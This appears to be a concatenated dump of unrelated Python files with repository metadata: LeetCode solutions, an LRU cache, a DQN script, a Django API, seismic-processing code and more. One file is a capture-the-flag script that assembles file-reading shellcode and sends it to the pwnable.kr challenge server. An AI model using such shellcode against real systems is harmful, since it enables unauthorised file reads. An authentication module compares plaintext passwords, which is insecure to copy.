        self._tail = None    # most recently used

    def get(self, key):
        """Return the value for `key`, or -1 when absent.

        :type key: int
        :rtype: int
        """
        if key not in self._storage:
            return -1
        node = self._storage[key]
        self._shift(node)  # mark as most recently used
        return node.value

    def put(self, key, value):
        """Insert/update `key`, evicting the LRU entry when over capacity.

        :type key: int
        :type value: int
        :rtype: void
        """
        node = self._storage.get(key)
        if node:
            node.value = value
            self._shift(node)
        else:
            node = Node(key, value)
            self._storage[key] = node
            self._append(node)
            if len(self._storage) > self._capacity:
                node = self._popleft()
                del self._storage[node.key]

    def _shift(self, node):
        # Unlink `node` from its current position and re-append at the tail.
        if node.prev:
            node.prev.next = node.next
        else:
            self._head = self._head.next
        if node.next:
            node.next.prev = node.prev
        else:
            self._tail = self._tail.prev
        node.next = node.prev = None
        self._append(node)

    def _append(self, node):
        # Attach a detached node at the tail (MRU end).
        assert not node.prev
        assert not node.next
        if self._tail:
            self._tail.next = node
            node.prev = self._tail
            self._tail = node
        else:
            self._head = node
            self._tail = node

    def _popleft(self):
        # Detach and return the LRU node.
        head = self._head
        self._head = head.next
        if self._head:
            self._head.prev = None
        else:
            # fix: original did `self._head.prev = None` unconditionally and
            # crashed with AttributeError when popping the only node
            # (reachable when capacity <= 0); keep head/tail consistent.
            self._tail = None
        head.next = None
        return head
class Node:
    """Doubly-linked-list node pairing a cache key with its value."""

    def __init__(self, key, value):
        self.key, self.value = key, value
        self.prev = self.next = None
# Your LRUCache object will be instantiated and called as such:
# obj = LRUCache(capacity)
# param_1 = obj.get(key)
# obj.put(key,value)
|
[
"davll.xc@gmail.com"
] |
davll.xc@gmail.com
|
df5d0f9cd9fbd10df401ae6829425f78b699d912
|
e8c303ca35a1f6b231193518fa5924d9a4cff0f0
|
/frog-orchestrator/orchestrator_core/userAuthentication.py
|
aa0f5c430bbcb63000093d1e9dc37992329fae84
|
[] |
no_license
|
netgroup-polito/frog3
|
69187fa716fe4f93e0abea2e0df09f0dca2a721b
|
3ad63ac25dddd8ba4bd9ab958f3c418e513b4ac9
|
refs/heads/master
| 2021-01-10T07:06:07.598744
| 2016-04-12T16:28:40
| 2016-04-12T16:28:40
| 36,660,818
| 9
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,558
|
py
|
'''
Created on 18 set 2015
@author: Andrea
'''
from sql.user import User
from orchestrator_core.exception import unauthorizedRequest
class UserData(object):
    # Simple holder for an authenticated user's username/password/tenant.
    def __init__(self, usr=None, pwd=None, tnt=None):
        self.username = usr
        self.password = pwd
        self.tenant = tnt

    def getUserID(self):
        # Look up the numeric id for self.username via the User table.
        return User().getUser(self.username).id

    def getUserData(self, user_id):
        # Populate this object from the DB record with the given id.
        user = User().getUserFromID(user_id)
        self.username = user.name
        self.password =user.password
        tenant = User().getTenantName(user.tenant_id)
        self.tenant = tenant
class UserAuthentication(object):
    # Validates credentials carried either in REST headers or passed directly.

    def authenticateUserFromRESTRequest(self, request):
        # Credentials arrive in custom X-Auth-* request headers.
        username = request.get_header("X-Auth-User")
        password = request.get_header("X-Auth-Pass")
        tenant = request.get_header("X-Auth-Tenant")
        return self.authenticateUserFromCredentials(username, password, tenant)

    def authenticateUserFromCredentials(self, username, password, tenant):
        # Return a UserData for valid credentials; raise unauthorizedRequest
        # on missing or invalid ones.
        if username is None or password is None or tenant is None:
            raise unauthorizedRequest('Authentication credentials required')
        user = User().getUser(username)
        # SECURITY(review): plaintext, non-constant-time password comparison;
        # passwords appear to be stored unhashed — confirm and consider hashing.
        if user.password == password:
            tenantName = User().getTenantName(user.tenant_id)
            if tenantName == tenant:
                userobj = UserData(username, password, tenant)
                return userobj
        raise unauthorizedRequest('Invalid authentication credentials')
|
[
"stefanopet91@users.noreply.github.com"
] |
stefanopet91@users.noreply.github.com
|
dab19d4e555500f277957d95c0d1e3041bcaad0e
|
3b21cbe5320137a3d8f7da40558294081211f63f
|
/Chapter12/FrozenDeepQLearning.py
|
4910dba92203d7d02671ade946a3825a0a32ecd4
|
[
"MIT"
] |
permissive
|
Evelynatrocks/Python-Machine-Learning-Cookbook-Second-Edition
|
d06812bba0a32a9bd6e5e8d788769a07d28084cd
|
99d8b799dbfe1d9a82f0bcc3648aaeb147b7298f
|
refs/heads/master
| 2023-04-06T20:23:05.384943
| 2021-01-18T12:06:36
| 2021-01-18T12:06:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,065
|
py
|
import gym
import numpy as np
from keras.models import Sequential
from keras.layers.core import Dense, Reshape
from keras.layers.embeddings import Embedding
from keras.optimizers import Adam
from rl.agents.dqn import DQNAgent
from rl.policy import BoltzmannQPolicy
from rl.memory import SequentialMemory
ENV_NAME = 'FrozenLake-v0'
env = gym.make(ENV_NAME)
# Seed numpy and the environment for reproducible runs.
np.random.seed(1)
env.seed(1)
Actions = env.action_space.n
# Q-network: embed each of the 16 discrete states to a 4-vector (one value
# per action), then flatten the (1, 4) embedding output to shape (4,).
model = Sequential()
model.add(Embedding(16, 4, input_length=1))
model.add(Reshape((4,)))
print(model.summary())
# Replay buffer and Boltzmann exploration policy for the DQN agent.
memory = SequentialMemory(limit=10000, window_length=1)
policy = BoltzmannQPolicy()
Dqn = DQNAgent(model=model, nb_actions=Actions,
               memory=memory, nb_steps_warmup=500,
               target_model_update=1e-2, policy=policy,
               enable_double_dqn=False, batch_size=512
               )
Dqn.compile(Adam())
# Train for 100k steps, save the weights, then run 20 evaluation episodes.
Dqn.fit(env, nb_steps=1e5, visualize=False, verbose=1, log_interval=10000)
Dqn.save_weights('dqn_{}_weights.h5f'.format(ENV_NAME), overwrite=True)
Dqn.test(env, nb_episodes=20, visualize=False)
|
[
"joecasillas001@gmail.com"
] |
joecasillas001@gmail.com
|
04b413200d5c5c14c693f31cdea71096cfa5b87c
|
8dde6f201657946ad0cfeacab41831f681e6bc6f
|
/617_merger_two_binary_tree.py
|
29f9c56efed4c228638367c559ef7b02757f5f57
|
[] |
no_license
|
peraktong/LEETCODE_Jason
|
c5d4a524ba69b1b089f18ce4a53dc8f50ccbb88c
|
06961cc468211b9692cd7a889ee38d1cd4e1d11e
|
refs/heads/master
| 2022-04-12T11:34:38.738731
| 2020-04-07T21:17:04
| 2020-04-07T21:17:04
| 219,398,022
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,511
|
py
|
#Definition for a binary tree node.
class TreeNode:
    """Binary-tree node: a value plus optional left/right children."""

    def __init__(self, x):
        self.val = x
        self.left = self.right = None
class Solution():
    def mergeTrees(self, t1, t2):
        """
        :type t1: TreeNode
        :type t2: TreeNode
        :rtype: TreeNode
        """
        # Merge t2 into t1 in place: overlapping nodes sum their values and
        # subtrees present only in t2 are grafted onto t1 (iterative version
        # of the usual recursion, using an explicit work stack).
        if not t1:
            return t2
        if not t2:
            return t1
        stack = [(t1, t2)]
        while stack:
            a, b = stack.pop()
            a.val += b.val
            # Recurse only where both children exist; otherwise adopt b's child.
            if a.left and b.left:
                stack.append((a.left, b.left))
            elif b.left:
                a.left = b.left
            if a.right and b.right:
                stack.append((a.right, b.right))
            elif b.right:
                a.right = b.right
        return t1
# Demo: build the two sample trees node-by-node and merge them.
# fix: the original passed whole Python lists to TreeNode (TreeNode(x=[1,3,2,5])),
# which stores the list as a single node's value and never builds a tree.
t1 = TreeNode(1)
t1.left = TreeNode(3)
t1.right = TreeNode(2)
t1.left.left = TreeNode(5)
t2 = TreeNode(2)
t2.left = TreeNode(1)
t2.right = TreeNode(3)
t2.left.right = TreeNode(4)
t2.right.right = TreeNode(7)
model = Solution()
final = model.mergeTrees(t1=t1,t2=t2)
|
[
"caojunzhi@caojunzhisMBP3.fios-router.home"
] |
caojunzhi@caojunzhisMBP3.fios-router.home
|
60e4c38da404de4ba7dd46169d7c52c288298335
|
ff55497043e91b5168b54369f3fd3f400dc9cf22
|
/project/osmosis/event/api/views.py
|
14fc471a28bddb1ce37cad0dcec068af4eba4872
|
[] |
no_license
|
kirami/Appevate
|
c890329928e2a9f91ded1cde29477c86b58e35ca
|
ee62eacd66606f3baf308718e5dbc6b7e55ba43b
|
refs/heads/master
| 2022-12-02T00:07:59.448070
| 2020-07-22T01:23:27
| 2020-07-22T01:23:27
| 211,752,576
| 0
| 0
| null | 2022-11-22T05:52:38
| 2019-09-30T01:36:35
|
HTML
|
UTF-8
|
Python
| false
| false
| 2,609
|
py
|
from rest_framework import viewsets, permissions
from django.http import Http404
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
from rest_framework import generics
from ..models import Event
from .serializers import EventSerializer
from rest_framework.permissions import IsAuthenticated
import logging
logger = logging.getLogger(__name__)
class EventViewSet(viewsets.ModelViewSet):
    # Standard CRUD endpoints for Event via DRF's ModelViewSet.
    model = Event
    serializer_class = EventSerializer
    queryset = Event.objects.all()
    # NOTE(review): the block below is dead code kept as a bare string
    # literal — it is never executed. Consider deleting it.
    '''
    def get_permissions(self):
        """
        Permissions for the ``User`` endpoints.
        - Allow create if the user is not authenticated.
        - Allow all if the user is staff.
        - Allow all if the user who is making the request is the same
            as the object in question.
        """
        return (permissions.AllowAny() if self.request.method == 'POST'
                else IsStaffOrTargetUser()),
    '''
class EventList(generics.ListCreateAPIView):
"""
get:
Return a list of existing Events, filtered by any paramater sent.<br>
Possible Parameters - <br>
   id - Id of the Event you'd like to view<br>
   host - Id of the User who is hosting an Event<br>
   program - Program under which the Event is listed.<br>
   name - Name of the Event you'd like to search for<br>
post:
Create a new Event instance.
"""
serializer_class = EventSerializer
permission_classes = (IsAuthenticated,)
def get_queryset(self):
queryset = Event.objects.all()
host = self.request.query_params.get('host', None)
name = self.request.query_params.get('name', None)
program = self.request.query_params.get('program', None)
item_id = self.request.query_params.get('id', None)
if item_id is not None:
queryset = queryset.filter(id=item_id)
if name is not None:
queryset = queryset.filter(name=name)
if host is not None:
queryset = queryset.filter(host=host)
if program is not None:
queryset = queryset.filter(program=program)
return queryset
class EventDetail(generics.RetrieveUpdateDestroyAPIView):
"""
Get Detail of single Event
put:
Replacing entire Event instance.
patch:
Update an Event instance
delete:
Delete an Event instance
"""
queryset = Event.objects.all()
serializer_class = EventSerializer
permission_classes = (IsAuthenticated,)
|
[
"="
] |
=
|
9b05835b3205d9de4fd50aa8af20d2fbceef046d
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/verbs/_struggled.py
|
e5baa8e75aa991db85ea0ac09e2bb191bec47c29
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 252
|
py
|
from xai.brain.wordbase.verbs._struggle import _STRUGGLE
#calss header
class _STRUGGLED(_STRUGGLE, ):
def __init__(self,):
_STRUGGLE.__init__(self)
self.name = "STRUGGLED"
self.specie = 'verbs'
self.basic = "struggle"
self.jsondata = {}
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
bf4267262480d8f9e04bb70a25dc61e4d56cdfe1
|
c36d9d70cbb257b2ce9a214bcf38f8091e8fe9b7
|
/977_squares_of_a_sorted_array.py
|
b06d138fadd0a72054f3ac664f5b51dc8b9a84ce
|
[] |
no_license
|
zdadadaz/coding_practice
|
3452e4fc8f4a79cb98d0d4ea06ce0bcae85f96a0
|
5ed070f22f4bc29777ee5cbb01bb9583726d8799
|
refs/heads/master
| 2021-06-23T17:52:40.149982
| 2021-05-03T22:31:23
| 2021-05-03T22:31:23
| 226,006,763
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 463
|
py
|
class Solution:
def sortedSquares(self, nums: List[int]) -> List[int]:
l = 0
r = len(nums)-1
res = []
while l <= r:
if l == r:
res.append(nums[r]*nums[r])
break
if nums[l]*nums[l] < nums[r]*nums[r]:
res.append(nums[r]*nums[r])
r-=1
else:
res.append(nums[l]*nums[l])
l+=1
return res[::-1]
|
[
"zdadadaz5566@gmail.com"
] |
zdadadaz5566@gmail.com
|
fed1b0600df776f414b4d2a66a68c13f4e7e15c1
|
8dbf11fe48645d79da06e0c6e9d6a5cc5e3116d5
|
/pwnable_kr/asm/myShellcode.py
|
adddf23bdafcaa8b8825def5d8aa9549a4c91028
|
[] |
no_license
|
itaysnir/Learning
|
e1efb6ab230b3c368214a5867ef03670571df4b7
|
a81c351df56699cc3f25618c81f8e04259596fd3
|
refs/heads/master
| 2021-05-23T09:33:58.382930
| 2021-02-17T19:36:46
| 2021-02-17T19:36:46
| 253,222,982
| 0
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,868
|
py
|
import pwnlib
import socket
FLAG_NAME = ".////this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong"
IP = "pwnable.kr"
PORT = 9026
CHUNK = 4096
def main():
s = socket.socket()
s.connect ((IP,PORT))
data = s.recv (CHUNK)
print (data)
data = s.recv (CHUNK)
print (data)
reverse_flag_name_chunks = list(map(''.join, zip(*[iter(FLAG_NAME)]*4)))[::-1]
# open syscall
shellcode = ''
shellcode += pwnlib.asm.asm ("xor eax, eax")
shellcode += pwnlib.asm.asm ("push eax") # needed for the string null byte
shellcode += pwnlib.asm.asm ("add eax, 5")
for chunk in reverse_flag_name_chunks:
num = "0x" + ''.join(x.encode('hex') for x in chunk[::-1])
shellcode += pwnlib.asm.asm ("push {}".format(num))
shellcode += pwnlib.asm.asm ("mov ebp, esp")
# shellcode += pwnlib.asm.asm ("xor ecx, ecx")
shellcode += pwnlib.asm.asm ("xor edx, edx")
shellcode += pwnlib.asm.asm ("int 0x80")
# read syscall
shellcode += pwnlib.asm.asm ("xor eax, eax")
shellcode += pwnlib.asm.asm ("add eax, 3")
shellcode += pwnlib.asm.asm ("mov ecx, ebx")
shellcode += pwnlib.asm.asm ("xor ebx, ebx")
shellcode += pwnlib.asm.asm ("add ebx, 3")
shellcode += pwnlib.asm.asm ("xor edx, edx")
shellcode += pwnlib.asm.asm ("mov dl, 0x60")
shellcode += pwnlib.asm.asm ("int 0x80")
# write syscall
shellcode += pwnlib.asm.asm ("xor eax, eax")
shellcode += pwnlib.asm.asm ("add eax, 4")
shellcode += pwnlib.asm.asm ("xor ebx, ebx")
shellcode += pwnlib.asm.asm ("add ebx, 1")
shellcode += pwnlib.asm.asm ("int 0x80")
shellcode += '\n'
print (shellcode)
s.send (shellcode)
data = s.recv (CHUNK)
print (data)
data = s.recv (CHUNK)
print (data)
if __name__ == '__main__':
main()
|
[
"root@localhost.localdomain"
] |
root@localhost.localdomain
|
640729d778883cd226020e47fea25bef8b99c520
|
5730110af5e4f0abe538ed7825ddd62c79bc3704
|
/pacu/pacu/api/__init__.py
|
5175c837b94da18470240e65eb75f00c9ed2e717
|
[] |
no_license
|
jzeitoun/pacu-v2
|
bdbb81def96a2d87171ca20b89c878b2f66975e7
|
0ccb254a658263b4fe8c80ea623f860cb7dc1428
|
refs/heads/master
| 2021-06-03T18:50:50.890399
| 2020-04-27T16:31:59
| 2020-04-27T16:31:59
| 110,889,657
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,680
|
py
|
import sys
from argparse import ArgumentParser, Action
if sys.argv[0] in ['-c', '-m']:
sys.argv[0] = 'python -m %s' % __package__
parser = ArgumentParser(
description = 'PACU v0.0.1',
epilog = "Contact to: Hyungtae Kim <hyungtk@uci.edu>",
)
group = parser.add_argument_group(
title='profiles',
description='''
You can provide a specific set of profiles for essential configurations.
It is strongly recommended to go through
the profile section of the documentation before you use it in production.
Profiles should be passed in prior to specific API.
''')
group.add_argument('--web', metavar='PROFILE',
help='which profile to use for web')
group.add_argument('--db', metavar='PROFILE',
help='which profile to use for db')
group.add_argument('--log', metavar='PROFILE',
help='which profile to use for log')
group.add_argument('--opt', metavar='PROFILE',
help='which profile to use for opt')
subparsers = parser.add_subparsers(
title = 'Available APIs',
dest = 'api',
metavar = 'API',
help = 'Description',
description = '''
You can get additional help by typing one of below commands.
Also, it is possible to override current profile by
passing arguments like `--web.port=12345 --db.echo=false`.
Make sure these extra arguments should come after specific API.
''',
)
def metavars(var, args):
return {
action.dest: getattr(args, action.dest)
for action in parser._actions
if action.metavar==var}
# API registration
# from . import ping
from . import prof
from . import serve
from . import shell
# from . import query
# from . import vstim
|
[
"jzeitoun@uci.edu"
] |
jzeitoun@uci.edu
|
89d41180976614c3296c1f1ce9742f81d479d5cd
|
acdc8a6dcf131592ef7edb6452ee9da656d47d18
|
/src/spv/demoFault2dCrf.py
|
68062296649c2e88d4739e0da4f68460c439a60d
|
[] |
no_license
|
xuewengeophysics/xmw
|
c359ed745c573507d1923375d806e6e87e3982a2
|
5f36d5f140dcfc0b7da29084c09d46ab96897f3c
|
refs/heads/master
| 2021-01-01T19:44:07.737113
| 2017-07-27T17:56:21
| 2017-07-27T17:56:21
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,065
|
py
|
#############################################################################
"""
Demo of dynamic warping for automatic picking
Author: Xinming Wu, University of Texas at Austin
Version: 2016.06.01
"""
from utils import *
setupForSubset("crf2d")
s1,s2,s3 = getSamplings()
n1,n2,n3 = s1.count,s2.count,s3.count
f1,f2,f3 = s1.getFirst(),s2.getFirst(),s3.getFirst()
d1,d2,d3 = s1.getDelta(),s2.getDelta(),s3.getDelta()
#############################################################################
gxfile = "gx808"
gxfile = "gx3366"
elfile = "el"
fpfile = "fp"
fefile = "fe"
ftfile = "ft"
flfile = "fl"
ptfile = "pt"
fvfile = "fv"
pngDir = getPngDir()
pngDir = None
plotOnly = False
def main(args):
#goFaultLikelihood()
#goLinearity()
#goFaultOrientScan()
goPathVoting()
def goLinearity():
gx = readImage(gxfile)
el = zerofloat(n1,n2)
lof = LocalOrientFilter(16,8)
est = lof.applyForTensors(gx)
dst = DstCoherence(est,30)
dst.setEigenvalues(1,0.01)
dst.applyForLinear(gx,el)
writeImage(elfile,el)
el = pow(el,8)
plot(gx,sub(1,el),cmin=0.6,cmax=1.0,cmap=jetRamp(1.0),label="Linearity")
def goFaultOrientScan():
gx = readImage(gxfile)
el = readImage(elfile)
fos = FaultOrientScanner2(8)
fe,fp = fos.scanDip(65,80,el)
ft,pt = fos.thin([fe,fp])
writeImage(ftfile,ft)
writeImage(ptfile,pt)
def goPathVoting():
gx = readImage(gxfile)
if not plotOnly:
ft = readImage(ftfile)
pt = readImage(ptfile)
osv = OptimalPathVoter(20,60)
osv.setStrainMax(0.2)
osv.setSurfaceSmoothing(2)
fv = osv.applyVoting(4,0.7,ft,pt)
writeImage(fvfile,fv)
else:
fv = readImage(fvfile)
plot(gx,cmin=-2,cmax=2,label="Amplitude")
plot(gx,fv,cmin=0.6,cmax=1.0,cmap=jetRamp(1.0),label="Path voting")
def goFaultLikelihood():
print "goFaultLikelihood ..."
gx = readImage(gxfile)
gx = FaultScanner2.taper(10,0,gx)
fs = FaultScanner2(30)
sig1,sig2,smooth=16.0,2.0,4.0
fl,ft = fs.scan(65,80,sig1,sig2,smooth,gx)
flt,ftt = fs.thin([fl,ft])
print "fl min =",min(fl)," max =",max(fl)
print "ft min =",min(ft)," max =",max(ft)
plot(gx,flt,cmin=0.6,cmax=1,cmap=jetRamp(1.0),neareast=True,
label="Fault Likelihood")
'''
plot2(s1,s2,gx,g=abs(ft),cmin=minTheta,cmax=maxTheta,cmap=jetFill(1.0),
label="Fault dip (degrees)",png="ft")
'''
def gain(x):
n2 = len(x)
n1 = len(x[0])
g = mul(x,x)
ref = RecursiveExponentialFilter(20.0)
ref.apply(g,g)
y = zerofloat(n1,n2)
div(x,sqrt(g),y)
return y
def smooth(sig,u):
v = copy(u)
rgf = RecursiveGaussianFilterP(sig)
rgf.apply0(u,v)
return v
def smooth2(sig1,sig2,u):
v = copy(u)
rgf1 = RecursiveGaussianFilterP(sig1)
rgf2 = RecursiveGaussianFilterP(sig2)
rgf1.apply0X(u,v)
rgf2.applyX0(v,v)
return v
def normalize(e):
emin = min(e)
emax = max(e)
return mul(sub(e,emin),1.0/(emax-emin))
def etran(e):
#return transpose(pow(e,0.25))
return transpose(e)
def dtran(d):
return transpose(d)
def makeSequences():
n = 500
fpeak = 0.125
shift = 2.0/fpeak
#w = Warp1Function.constant(shift,n)
w = WarpFunction1.sinusoid(shift,n)
#f = makeCosine(fpeak,n)
f = makeRandomEvents(n,seed=seed);
g = w.warp(f)
f = addRickerWavelet(fpeak,f)
g = addRickerWavelet(fpeak,g)
f = addNoise(nrms,fpeak,f,seed=10*seed+1)
g = addNoise(nrms,fpeak,g,seed=10*seed+2)
s = zerofloat(n)
for i in range(n):
s[i] = w.ux(i)
return f,g,s
def makeCosine(freq,n):
return cos(mul(2.0*PI*freq,rampfloat(0.0,1.0,n)))
def makeRandomEvents(n,seed=0):
if seed!=0:
r = Random(seed)
else:
r = Random()
return pow(mul(2.0,sub(randfloat(r,n),0.5)),15.0)
def addRickerWavelet(fpeak,f):
n = len(f)
ih = int(3.0/fpeak)
nh = 1+2*ih
h = zerofloat(nh)
for jh in range(nh):
h[jh] = ricker(fpeak,jh-ih)
g = zerofloat(n)
Conv.conv(nh,-ih,h,n,0,f,n,0,g)
return g
def ricker(fpeak,time):
x = PI*fpeak*time
return (1.0-2.0*x*x)*exp(-x*x)
def addNoise(nrms,fpeak,f,seed=0):
n = len(f)
if seed!=0:
r = Random(seed)
else:
r = Random()
nrms *= max(abs(f))
g = mul(2.0,sub(randfloat(r,n),0.5))
g = addRickerWavelet(fpeak,g)
#rgf = RecursiveGaussianFilter(3.0)
#rgf.apply1(g,g)
frms = sqrt(sum(mul(f,f))/n)
grms = sqrt(sum(mul(g,g))/n)
g = mul(g,nrms*frms/grms)
return add(f,g)
#############################################################################
# plotting
gray = ColorMap.GRAY
jet = ColorMap.JET
backgroundColor = Color(0xfd,0xfe,0xff) # easy to make transparent
def jetFill(alpha):
return ColorMap.setAlpha(ColorMap.JET,alpha)
def jetFillExceptMin(alpha):
a = fillfloat(alpha,256)
a[0] = 0.0
return ColorMap.setAlpha(ColorMap.JET,a)
def bwrNotch(alpha):
a = zerofloat(256)
for i in range(len(a)):
if i<128:
a[i] = alpha*(128.0-i)/128.0
else:
a[i] = alpha*(i-127.0)/128.0
return ColorMap.setAlpha(ColorMap.BLUE_WHITE_RED,a)
def bwrFillExceptMin(alpha):
a = fillfloat(alpha,256)
a[0] = 0.0
return ColorMap.setAlpha(ColorMap.BLUE_WHITE_RED,a)
def jetRamp(alpha):
return ColorMap.setAlpha(ColorMap.JET,rampfloat(0.0,alpha/256,256))
def bwrRamp(alpha):
return ColorMap.setAlpha(ColorMap.BLUE_WHITE_RED,rampfloat(0.0,alpha/256,256))
def grayRamp(alpha):
return ColorMap.setAlpha(ColorMap.GRAY,rampfloat(0.0,alpha/256,256))
def plot(f,g=None,ps=None,t=None,cmap=None,cmin=None,cmax=None,cint=None,
label=None,neareast=False,png=None):
orientation = PlotPanel.Orientation.X1DOWN_X2RIGHT;
n1,n2=len(f[0]),len(f)
s1,s2=Sampling(n1),Sampling(n2)
panel = PlotPanel(1,1,orientation)#,PlotPanel.AxesPlacement.NONE)
panel.setVInterval(50)
panel.setHInterval(50)
panel.setHLabel("Inline (traces)")
panel.setVLabel("Depth (samples)")
pxv = panel.addPixels(0,0,s1,s2,f);
pxv.setColorModel(ColorMap.GRAY)
pxv.setInterpolation(PixelsView.Interpolation.LINEAR)
if g:
pxv.setClips(-2,2)
else:
if cmin and cmax:
pxv.setClips(cmin,cmax)
if g:
pv = panel.addPixels(s1,s2,g)
if neareast:
pv.setInterpolation(PixelsView.Interpolation.NEAREST)
else:
pv.setInterpolation(PixelsView.Interpolation.LINEAR)
pv.setColorModel(cmap)
if cmin and cmax:
pv.setClips(cmin,cmax)
if ps:
uv = panel.addPoints(0,0,ps[0],ps[1])
uv.setLineColor(Color.YELLOW)
uv.setLineWidth(2)
if label:
panel.addColorBar(label)
panel.setColorBarWidthMinimum(55)
moc = panel.getMosaic();
frame = PlotFrame(panel);
frame.setDefaultCloseOperation(PlotFrame.EXIT_ON_CLOSE);
#frame.setTitle("normal vectors")
frame.setVisible(True);
#frame.setSize(1400,700)
frame.setSize(round(n2*1.8),round(n1*2.0))
frame.setFontSize(12)
if pngDir and png:
frame.paintToPng(720,3.333,pngDir+png+".png")
#############################################################################
# Run the function main on the Swing thread
import sys
class _RunMain(Runnable):
def __init__(self,main):
self.main = main
def run(self):
self.main(sys.argv)
def run(main):
SwingUtilities.invokeLater(_RunMain(main))
run(main)
|
[
"xinwucwp@gmail.com"
] |
xinwucwp@gmail.com
|
90632c12ee018323d838f0314ad1509f5b1b1450
|
ac8ffabf4d7339c5466e53dafc3f7e87697f08eb
|
/python_solutions/1269.number_of_ways_to_stay_in_the_same_place_after_some_steps.py
|
726086e2ad3c752a2b74ee77af09767afc7d3401
|
[] |
no_license
|
h4hany/leetcode
|
4cbf23ea7c5b5ecfd26aef61bfc109741f881591
|
9e4f6f1a2830bd9aab1bba374c98f0464825d435
|
refs/heads/master
| 2023-01-09T17:39:06.212421
| 2020-11-12T07:26:39
| 2020-11-12T07:26:39
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,581
|
py
|
# https://leetcode.com/problems/number-of-ways-to-stay-in-the-same-place-after-some-steps
# Hard (Difficulty)
# You have a pointer at index 0 in an array of size arrLen. At each step, you can move 1 position to the left, 1 position to the right in the array or stay in the same place (The pointer should not be placed outside the array at any time).
# Given two integers steps and arrLen, return the number of ways such that your pointer still at index 0 after exactly steps steps.
# Since the answer may be too large, return it modulo 10^9 + 7.
#
# Example 1:
# Example 2:
# Example 3:
#
# Constraints:
# Input: steps = 3, arrLen = 2
# Output: 4
# Explanation: There are 4 differents ways to stay at index 0 after 3 steps.
# Right, Left, Stay
# Stay, Right, Left
# Right, Stay, Left
# Stay, Stay, Stay
#
# Input: steps = 2, arrLen = 4
# Output: 2
# Explanation: There are 2 differents ways to stay at index 0 after 2 steps
# Right, Left
# Stay, Stay
#
# Input: steps = 4, arrLen = 2
# Output: 8
#
# xxxxxxxxxx
# class Solution {
# public:
# int numWays(int steps, int arrLen) {
#
# }
# };
class Solution:
def numWays(self, steps: int, arrLen: int) -> int:
sz = min(steps // 2 + 1, arrLen) + 2
pre, cur = [0] * sz, [0] * sz
pre[1] = 1
while steps > 0:
for i in range(1, sz - 1):
cur[i] = (pre[i] + pre[i-1] + pre[i+1]) % 1000000007
pre, cur = cur, pre
steps -= 1
return pre[1]
print(Solution().numWays(4, 2))
|
[
"ssruoz@gmail.com"
] |
ssruoz@gmail.com
|
854ca1b46498b6117d9f373caa9b6aa1588e13d0
|
fa93e53a9eee6cb476b8998d62067fce2fbcea13
|
/build/pmb2_gazebo/catkin_generated/pkg.installspace.context.pc.py
|
c75e0ff2d2813071cbaee70567d2107aebd6d308
|
[] |
no_license
|
oyetripathi/ROS_conclusion_project
|
2947ee2f575ddf05480dabc69cf8af3c2df53f73
|
01e71350437d57d8112b6cec298f89fc8291fb5f
|
refs/heads/master
| 2023-06-30T00:38:29.711137
| 2021-08-05T09:17:54
| 2021-08-05T09:17:54
| 392,716,311
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 384
|
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "pmb2_gazebo"
PROJECT_SPACE_DIR = "/home/sandeepan/tiago_public_ws/install"
PROJECT_VERSION = "1.0.1"
|
[
"sandeepan.ghosh.ece20@itbhu.ac.in"
] |
sandeepan.ghosh.ece20@itbhu.ac.in
|
9a2357b2017589fa88e975403385725ce748aa8e
|
b103d82e2f99815b684a58cad043c14bbc43c1aa
|
/exercicios3/ex115.py
|
16a0f690f2137e5aaa6f2d96caae48e7c3d6fff5
|
[
"MIT"
] |
permissive
|
LuanGermano/Mundo-3-Curso-em-Video-Python
|
6e3ffc5d82de55194cf0cfd318f1f37ff7e04f1f
|
1dffda71ff769e4e901b85e4cca5595a5dbb545c
|
refs/heads/main
| 2023-07-09T22:40:13.710547
| 2021-08-04T05:16:22
| 2021-08-04T05:16:22
| 392,557,796
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 217
|
py
|
# Crie um pequeno sistema modularizado que permita cadastrar pessoas pelo seu nome e idade em um arquivo de texto simples.
# O sistema só vai ter 2 opções, cadastrar uma nova pessoa e listar todas as cadastradas
|
[
"88220713+LuanGermano@users.noreply.github.com"
] |
88220713+LuanGermano@users.noreply.github.com
|
35b3d73af0a8e35ea5d24e76857a1e773f865d8c
|
f0fe4f17b5bbc374656be95c5b02ba7dd8e7ec6d
|
/all_functions/linux server/python GUI/Video capture/VideoCapture-0.9-5/Tools/3rdParty/pushserver/server.py
|
83fe04d6bb7eef7b5a3a46f7d7f9eafce7ac910d
|
[
"LicenseRef-scancode-warranty-disclaimer",
"MIT",
"LGPL-2.1-only"
] |
permissive
|
Heroku-elasa/heroku-buildpack-python-ieee-new
|
f46a909ebc524da07f8e15c70145d1fe3dbc649b
|
06ec2fda04d9e478ed2506400e460489b0ca91ab
|
refs/heads/master
| 2022-12-10T13:14:40.742661
| 2020-01-29T14:14:10
